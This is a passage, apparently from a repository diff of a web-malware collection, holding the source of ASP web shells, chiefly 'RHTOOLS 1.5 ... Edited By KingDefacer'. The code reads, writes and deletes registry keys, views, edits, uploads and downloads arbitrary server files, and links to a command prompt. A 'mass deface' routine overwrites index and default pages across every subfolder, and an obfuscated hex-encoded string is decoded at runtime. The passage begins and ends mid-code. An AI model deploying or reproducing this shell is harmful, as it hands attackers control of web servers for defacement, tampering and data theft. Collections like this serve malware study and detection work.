Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
End If
Case "r"
If Trim(Request.QueryString("process")) = "yes" Then
Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
Response.Write "Valor: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
Else
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
Response.Write "<input type=""submit"" value=""OK""></form>"
End If
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Case "d"
If Trim(Request.QueryString("process")) = "yes" Then
teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>deletada"
Else
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
Response.Write "<input type=""submit"" value=""OK""></form>"
End If
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Case Else
Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">ESCREVER CHAVE</a><br><br>"
Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">LER CHAVE</a><br><br>"
Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETAR CHAVE</a><br>"
End Select
Set WshShell = Nothing
Case "txtview"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
Set a = Nothing
Set fso = Nothing
Case "txtedit"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Request.Form.Count = 0 Then
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
Set a = Nothing
Set fso = Nothing
Else
Select Case Trim(Request.Form("savemethod"))
Case "Save"
Set fso = CreateObject("Scripting.FileSystemObject")
novotexto = Trim(Request.Form("content"))
novotexto = Split(novotexto,vbCrLf)
Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i))
Next
objstream.Close
Set objstream = Nothing
Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
Case "Save as"
Set fso = CreateObject("Scripting.FileSystemObject")
novotexto = Trim(Request.Form("content"))
novotexto = Split(novotexto,vbCrLf)
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
Set objstream = fso.CreateTextFile(caminho,true,false)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i))
Next
objstream.Close
Set objstream = Nothing
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
Case Else
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
End If
End Select
End If
Case "download"
Response.Buffer = True
Response.Clear
strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
strFileType = Request.QueryString("type")
if strFileType = "" then strFileType = "application/download"
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(strFilename)
intFilelength = f.size
Set f = Nothing
Set fso = Nothing
Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
Response.AddHeader "Content-Length", intFilelength
Response.Charset = "UTF-8"
Response.ContentType = strFileType
Set Stream = Server.CreateObject("ADODB.Stream")
Stream.Open
Stream.type = 1
Stream.LoadFromFile strFileName
Response.BinaryWrite Stream.Read
Response.Flush
Stream.Close
Set Stream = Nothing
Case "upload"
If Request.QueryString("processupload") <> "yes" Then
Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
Response.Write "<TABLE BORDER=0>"
Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
Response.Write "</TABLE>"
Else
Set Uploader = New FileUploader
Uploader.Upload()
If Uploader.Files.Count = 0 Then
Response.Write "File(s) not uploaded."
Else
For Each File In Uploader.Files.Items
File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
Response.Write "File Uploaded: " & File.FileName & "<br>"
Response.Write "Size: " & File.FileSize & " bytes<br>"
Response.Write "Type: " & File.ContentType & "<br><br>"
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
Next
End If
End If
Case "mass"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
On Error Resume Next
Set MonRep = ObjFSO.GetFolder(caminhodomass)
Set ColFolders = MonRep.SubFolders
for each folderItem in ColFolders
destino1 = folderItem.path & "\index.htm"
destino2 = folderItem.path & "\index.html"
destino3 = folderItem.path & "\index.asp"
destino4 = folderItem.path & "\index.cfm"
destino5 = folderItem.path & "\index.php"
destino6 = folderItem.path & "\default.htm"
destino7 = folderItem.path & "\default.html"
destino8 = folderItem.path & "\default.asp"
destino9 = folderItem.path & "\default.cfm"
destino10 = folderItem.path & "\default.php"
MeuArquivo.Copy(destino1)
MeuArquivo.Copy(destino2)
MeuArquivo.Copy(destino3)
MeuArquivo.Copy(destino4)
MeuArquivo.Copy(destino5)
MeuArquivo.Copy(destino6)
MeuArquivo.Copy(destino7)
MeuArquivo.Copy(destino8)
MeuArquivo.Copy(destino9)
MeuArquivo.Copy(destino10)
Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
End If
Err.Number = 0
Response.Flush
If metodo = "brute" Then
Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
End If
next
End Sub
Sub brutemass(caminho,massaction)
If massaction = "test" Then
On Error Resume Next
Set MonRep = ObjFSO.GetFolder(caminho)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
for each folderItem in ColFolders
Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
Set EachFolder = TotalFolders.SubFolders
Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
maindestino = folderItem.path & "\"
MeuArquivo.Copy(maindestino)
Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
If EachFolder.count > 0 Then
masscontador = 0
for each subpasta in EachFolder
masscontador = masscontador + 1
destino = subpasta.path & "\"
If masscontador = 1 Then
destinofinal = destino
pathfinal = subpasta.path
Err.Number = 0
MeuArquivo.Copy(destinofinal)
Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
Else
MeuArquivo.Copy(destino)
Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
End If
next
masscontador = 0
End If
Response.Write "</table><br>"
Call brutemass(folderItem.path & "\","test")
next
Set MonRep = Nothing
Set ColFolders = Nothing
Set ColFiles0 = Nothing
Else
If Request.Form.Count = 0 Then
Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> copia os arquivos do deface para todas as pastas e subpastas (todos os níveis) do diretório escolhido (mais demorado). O tempo do deface vai variar de acordo com o numero TOTAL de diretórios.<br><br>"
Response.Write "<b>Single:</b> copia os arquivos do deface apenas para as pastas (primeiro nível) do diretório escolhido. Não inclui subpastas.<br><br>"
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
Response.Write "<center><font face=""arial"" size=""2"">Insira o código:<br>"
Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
Response.Write "<input type=""submit"" value=""w00t!""></center>"
Response.Write "</form>"
Else
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
arquivomassdfc = patharquivotxt & "teste.txt"
Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
vetordelinhas = Split(Request.Form("content"),VbCrLf)
For i = 0 To UBound(vetordelinhas)
Arquivotxt.WriteLine(vetordelinhas(i))
Next
Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
If Request.Form("massopt") = "single" Then
Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
ElseIf Request.Form("massopt") = "brute" Then
Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
End If
End If
End If
End Sub
If Trim(Request.QueryString("massact")) = "test" Then
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
arquivo = patharquivotxt & "_vti_cnf.log"
Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
Set MeuArquivo = ObjFSO.GetFile(arquivo)
Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
End If
Case Else
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Call showcontent()
End Select
If Err.Number <> 0 Then
Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse o <b>ONLINE HELP</b> para a explicação do erro"
End If
Response.Write endcode
%>

793
web-malware-collection-13-06-2012/ASP/toolaspshell.txt Normal file
View file

@ -0,0 +1,793 @@
<%@ LANGUAGE = VBScript.Encode %>
<%
On Error Resume Next
Server.ScriptTimeOut = 7200
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
For nIndex = 1 to LenB(FileData)
oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
Next
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA01902E59F7273E1902E597A18C51902E59AC1E8F1902E59DE24591902E55F5B0911902E53CF70E31902E597A18C51902E5B2349FA1902E5A422FED1902E597A18C51902E5A8D389C1902E53CF70E31902E53205CA01902E5B3C4CDF1902E5A422FED1902E5BEB61221902E59DE24591902E55F5B0911902E53CF70E31902E54C98DD51902E53CF70E31902E560EB3761902E547E85261902E55AAA7E21902E55AAA7E21902E53205CA01902E5802ED5A1902E5708D0681902E5834F3241902E57B7E4AB1902E57B7E4AB1902E576CDBFC1902E581BF03F1902E53205CA01902E54C98DD51902E547E85261902E552D99691902E53205CA01902E5672BF0A1902E56BDC7B91902E5834F3241902E5659BC251902E53E873C81902E57D0E7901902E5866F8EE1902E5834F3241902E540176AD1902E53B66DFE1902E59AC1E8F1902E5AD8414B1902E5AF144301902E5BD25E3D1902E55C3AAC71902E53205CA01902E5672BF0A1902E58B2019D1902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5AA63B811902E597A18C51902E5A422FED1902E5A8D389C1902E5B554FC41902E5AD8414B1902E55AAA7E21902E5B2349FA1902E5A292D081902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B1902E5B2349FA1902E5640B9401902E597A18C51902E5ABF3E661902E5B554FC41902E5A422FED1902E5B3C4CDF1902E5AD8414B1902E59AC1E8F1902E5A422FED1902E597A18C51902E5A8D389C1902E547E85261902E59AC1E8F1902E5AD8414B1902E5AA63B811902E53CF70E31902E560EB3761902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E53205CA01902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E546582411902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E53CF70E31902E53205CA01902E5B554FC41902E597A18C51902E5B2349FA1902E5A102A231902E59DE24591902E5B554FC41902E55F5B0911902E53CF70E31902E594812FB1902E59931BAA1902E5A8D389C1902E597A18C51902E5ABF3E661902E5A7435B71902E53CF70E31902E560EB3761902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E55AAA7E21902E55AAA7E21902E547E85261902E55DCADAC1902E5497880B1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E560EB3761902E5|337308|1A7023"
startcode = "<html><head><title>RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer</title></head><body>"
endocde = "</body></html>"
onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://www.rhesusfactor.cjb.net"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
Function DeCryptString(strCryptString)
Dim strRAW, arHexCharSet, i, intKey, intOffSet, strRawKey, strHexCrypData
strRawKey = Right(strCryptString, Len(strCryptString) - InStr(strCryptString, "|"))
intOffSet = Right(strRawKey, Len(strRawKey) - InStr(strRawKey,"|"))
intKey = HexConv(Left(strRawKey, InStr(strRawKey, "|") - 1)) - HexConv(intOffSet)
strHexCrypData = Left(strCryptString, Len(strCryptString) - (Len(strRawKey) + 1))
arHexCharSet = Split(strHexCrypData, Hex(intKey))
For i=0 to UBound(arHexCharSet)
strRAW = strRAW & Chr(HexConv(arHexCharSet(i))/intKey)
Next
DeCryptString = CStr(strRAW)
End Function
Function HexConv(hexVar)
Dim hxx, hxx_var, multiply
IF hexVar <> "" THEN
hexVar = UCASE(hexVar)
hexVar = StrReverse(hexVar)
DIM hx()
REDIM hx(LEN(hexVar))
hxx = 0
hxx_var = 0
FOR hxx = 1 TO LEN(hexVar)
IF multiply = "" THEN multiply = 1
hx(hxx) = mid(hexVar,hxx,1)
hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
multiply = (multiply * 16)
NEXT
hexVar = hxx_var
HexConv = hexVar
END IF
End Function
cprthtml = "<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer &copy; BY <a href='mailto:kingdefacer@msn.com'>KingDefacer</a> - <a href='HTTP://WWW.alturks.com' target='_blank'>HTTP://WWW.alturks.com</a> ::.</font>"
Function get_hxno(ghx)
If ghx = "A" Then
ghx = 10
ElseIf ghx = "B" Then
ghx = 11
ElseIf ghx = "C" Then
ghx = 12
ElseIf ghx = "D" Then
ghx = 13
ElseIf ghx = "E" Then
ghx = 14
ElseIf ghx = "F" Then
ghx = 15
End If
get_hxno = ghx
End Function
keydec = DeCryptString(key)
Function showobj(objpath)
showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
End Function
Function showobjpath(objpath)
showobjpath = Left(objpath,InstrRev(objpath,"\"))
End Function
Function checking(a,b)
If CStr(Mid(a,95,13)) <> CStr(Mid(b,95,13)) Then
pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
Response.Redirect(pagina)
End If
End Function
Sub hdr()
Response.Write startcode
Response.Write keydec
Response.Write "<br>"
End Sub
Sub showcontent()
Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
If Trim(Request.QueryString("raiz")) = "root" Then
Set fs=Server.Createobject("Scripting.FileSystemObject")
Set drivecollection=fs.drives
Response.Write "<font face=""arial"" size=""2"">"
For Each drive IN drivecollection
str=drive.driveletter & ":"
Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
Select Case drive.DriveType
Case 0
tipodrive = "Unknown"
nomedrive = drive.VolumeName
Case 1
tipodrive = "Removable"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 2
tipodrive = "Fixed"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 3
tipodrive = "Network"
If drive.isready Then
nomedrive = drive.ShareName
Else
nomedrive = ""
End If
Case 4
tipodrive = "CD-Rom"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 5
tipodrive = "RAM Disk"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
End Select
response.write "<b>Tipo:</b> " & tipodrive & "<br>"
response.write "<b>Nome: </b>" & nomedrive & "<br>"
response.write "<b>Sistema de Arquivos: </b>"
If drive.isready Then
set sp=fs.getdrive(str)
response.write sp.filesystem & "<br>"
Else
response.write "-<br>"
End If
Response.Write "<b>Espaço Livre: </b>"
If drive.isready Then
freespace = (drive.AvailableSpace / 1048576)
set sp=fs.getdrive(str)
response.write(Round(freespace,1) & " MB<br>")
Else
response.write("-<br>")
End If
Response.Write "<b>Espaço Total: </b>"
If drive.isready Then
totalspace = (drive.TotalSize / 1048576)
set sp=fs.getdrive(str)
response.write(Round(totalspace,1) & " MB<br>")
Else
response.write("-<br>")
End If
Response.Write "<br>"
Next
Response.Write "</font>"
Set fs = Nothing
Set drivecollection = Nothing
set sp=Nothing
Else
If Trim(Request.QueryString("raiz")) = "" Then
caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
pos = Instr(caminho,"\")
pos2 = 1
While pos2 <> 0
If Instr(pos + 1,caminho,"\") <> 0 Then
pos = Instr(pos + 1,caminho,"\")
Else
pos2 = 0
End If
Wend
raiz = Left(caminho,pos)
Else
raiz = trim(Request.QueryString("raiz")) & "\"
End If
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(raiz)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=760,height=540,scrollbars=YES,resizable')"">PROMPT</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=250,scrollbars=YES,resizable')"">REGEDIT</a></font><br><br>"
Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
If CInt(Len(raiz) - 1) <> 2 Then
barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
backlevel = Left(raiz,barrapos)
Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
Else
Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
End If
